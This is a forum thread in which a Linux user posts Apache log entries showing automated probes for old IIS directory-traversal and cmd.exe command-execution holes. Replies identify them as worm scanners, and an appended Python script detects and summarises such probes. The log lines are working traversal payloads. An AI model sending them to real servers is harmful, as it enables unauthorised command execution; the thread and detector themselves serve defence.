  1. #1
    Linux User
    Join Date
    Jun 2003
    Location
    Huntington Beach, CA
    Posts
    390

    going through apache logs, found something wacky


    Well I'm starting to mess around with my Apache logs a bit, figuring out some stuff I can do with them, and I keep coming across little sections of the following throughout:
    Code:
    24.14.8.171 - - [07/Jan/2004:15:36:37 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:37 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 309 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:38 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:38 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:38 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:39 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:39 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 350 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:39 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 366 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:43 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:43 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:43 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:44 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:44 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 323 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:44 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 323 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:45 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
    24.14.8.171 - - [07/Jan/2004:15:36:45 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
    I'm not sure what it is, looks like a hack attempt, but my guess is it's not good, any thoughts?

  2. #2
    Linux Guru
    Join Date
    Oct 2001
    Location
    Täby, Sweden
    Posts
    7,578
    It's just automated crackbots on the internet doing subnet scanning for IIS vulnerabilities (I'd guess those are the old CodeRed bots). The best thing you can do is report them to their ISPs, so that at least they're made aware that they are cracked.

  3. #3
    Linux Guru lakerdonald
    Join Date
    Jun 2004
    Location
    St. Petersburg, FL
    Posts
    5,035
    I'd say a stupid hacker who doesn't realize it's a Linux box.
    He's trying to get access to your box, I'd say.
    yikes,
    -lakerdonald
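
One way to triage probes like the ones in this thread, as an added example that is not part of any poster's reply: it flags the encoding tricks visible in the log lines above, groups them by client IP, and records the status codes so you can confirm nothing was served before filing an abuse report. The names `classify` and `summarize` and the sample input are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Apache combined log format: host ident user [time] "METHOD URI ..." status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" (\d{3}) ')

# Constructed sample: three lines from the thread's log plus one benign request.
SAMPLE_LOG = """\
24.14.8.171 - - [07/Jan/2004:15:36:37 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:38 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333 "-" "-"
24.14.8.171 - - [07/Jan/2004:15:36:43 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 332 "-" "-"
192.0.2.10 - - [07/Jan/2004:15:40:00 -0800] "GET /index.html HTTP/1.0" 200 1024 "-" "-"
"""

def classify(uri):
    """Return the probe indicators present in one request URI."""
    tags = set()
    once = unquote_to_bytes(uri)
    twice = unquote_to_bytes(once)
    if twice != once:
        tags.add("double-encoding")  # %255c -> %5c -> backslash
    # Non-canonical two-byte sequences from the log (%c0%af is an overlong '/')
    if re.search(rb"\xc0[\x2f\xaf]|\xc1[\x1c\x9c]", once):
        tags.add("overlong-utf8")
    if re.search(rb"(cmd|root)\.exe", twice, re.I):
        tags.add("windows-shell")
    return tags

def summarize(log_text):
    """Group flagged requests by client IP for triage or an abuse report."""
    report = defaultdict(lambda: {"hits": 0, "tags": set(), "statuses": set(),
                                  "first": None, "last": None})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        tags = classify(m.group(3)) if m else set()
        if not tags:
            continue
        r = report[m.group(1)]
        r["hits"] += 1
        r["tags"] |= tags
        r["statuses"].add(int(m.group(4)))
        r["first"] = r["first"] or m.group(2)
        r["last"] = m.group(2)
    return dict(report)

if __name__ == "__main__":
    for ip, r in summarize(SAMPLE_LOG).items():
        print(ip, r["hits"], sorted(r["tags"]), r["statuses"], r["first"], r["last"])
```

A status set containing only 4xx codes means every probe was rejected; any 2xx or 3xx entry for a flagged client is the line to look at first.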
